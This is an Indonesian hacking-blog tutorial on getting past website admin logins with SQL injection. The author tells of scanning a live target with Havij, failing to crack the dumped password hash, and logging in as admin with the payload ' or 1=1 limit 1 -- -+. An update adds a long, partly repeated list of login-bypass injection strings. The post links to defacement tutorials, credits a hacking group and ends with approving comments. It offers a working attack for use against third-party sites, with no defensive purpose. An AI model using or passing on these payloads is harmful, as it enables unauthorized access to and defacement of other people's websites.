Berhubung saya lagi mendapatkan target yang cocok buat tutorial ini Tutorial Bypass Sqli Login, yaudah sekalian di buat tutorial disini, buat belajar bersama.
Bypass sqli login maksudnya adalah login ke web target tanpa memasukan username dan password target, dengan memanfaatkan error pada bug sql yg ada di web target tersebut.
ceritanya kan saya lagi scan-scan web dengan havij, udah ketemu sih sebenarnya user dan passwordnya.
Ya tapi setelah mencoba menghash nya hasilnya NOT FOUND :(
Baca juga: Tutorial deface with sqlmap and acunetix
Tapi jangan menyerah dulu gan, coba kita bypass dulu, berhubung saya juga udah menemukan admin login nya jadi coba masukan.
User:
' or 1=1 limit 1 -- -+Password:
' or 1=1 limit 1 -- -+
Dan tarraaa.... Berhasilkan ^_^ sekian tutorialnya , Thanks to Indonesian Cyber Army
Baca juga:
- Tutorial deface dengan SQLI manual
- Tutorial deface with sqlmap and acunetix
- Tutorial mencari halaman login admin website
Update
Untuk kode bypass lainya:
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
==
and 1=1--
and 1=1
' or 'one'='one--
' or 'one'='one
' and 'one'='one
' and 'one'='one--
1') and '1'='1--
admin' --
admin' #
admin'/*
or 1=1--
or 1=1#
or 1=1/*
) or '1'='1--
) or ('1'='1--
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
Tag: bypass sql, bypass sql login, tutorial bypass, tutorial sql injection, tutorial deface, cara bypass, cara deface, Idiot Attacker
2 Komentar
nice artikel gan
Balastutorialnya bermanfaat gan. nais artikel :)
Balas